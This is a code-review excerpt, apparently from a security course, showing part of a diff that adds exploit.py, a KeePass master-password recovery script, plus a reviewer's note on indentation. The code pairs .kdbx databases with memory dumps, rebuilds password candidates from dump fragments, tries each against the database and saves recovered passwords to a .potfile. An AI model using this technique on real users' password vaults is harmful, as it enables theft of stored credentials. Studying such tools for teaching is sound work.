module-4/exploit/exploit.py

```diff
@@ -0,0 +1,142 @@
+            return
+        
+        print('********************************************************')
+        print(f'DUMP files founded:\n{dmp_files},\n')
+        print(f'KDBX files founded:\n{kdbx_files}')
+        print('********************************************************\n')
+        
+        successfully_passwords = []
+        for kdbx_file in kdbx_files:
+            corresponding_dmp = kdbx_file.replace('.kdbx', '.DMP')
+            if corresponding_dmp in dmp_files:
+                dmp_path = f'../dumps/{corresponding_dmp}'
+                kdbx_path = os.path.join(dir_path, kdbx_file)
+
+                print('********************************************************')
+                print(f'KDBX file: {kdbx_file}\n')
+                print(f'DUMP file: {corresponding_dmp}')
+                print('********************************************************\n')
+                print('Reading DUMP file ...\n')
+                
+                password_parts = read_dump_file(dmp_path)
+                password_found = False
+                
+                if len(password_parts) > 0:
+                    print('********************************************************')
+                    print('Reading DUMP file successfully!')
+                    print('********************************************************\n')
+                else:
+                    print(f'Keepass Password Dumper program closed.')
+                    print('********************************************************\n')
+                    exit()
+                
+                print('************************** Try passwords ******************************\n')
+                for password in password_parts:
+                    if password_found:
+                        break 
+
+                    for start_char in charset_first_char:
+                        if password_found:
+                            break 
+
+                        password_tail = password[20:]
+                        passwords_to_try = generate_passwords(start_char, [password_tail])
+                        
+                        for pw in passwords_to_try:
+                            if try_login(kdbx_path, pw):
+                                password_found = True
+                                successfully_passwords.append(f"{kdbx_file} : {pw}")
+                                break
+        if len(successfully_passwords) > 0: 
+            print('********************************************************')
+            print(f'Founded passwords:\n{successfully_passwords}')
+            print('********************************************************\n')
+            potfile = os.path.join(dir_path, '.potfile')
+            with open(potfile, 'w', encoding='utf-8') as file:
+                for pw_key_pair in successfully_passwords:
+                    file.write(f"{pw_key_pair}\n")
+            print('Passwords were written to the file .potfile.')
```

Comment:
you can also add one identation here to make this print more related with the `with open()` construct above, which would be the correct location (in terms of code-logic/-splitting)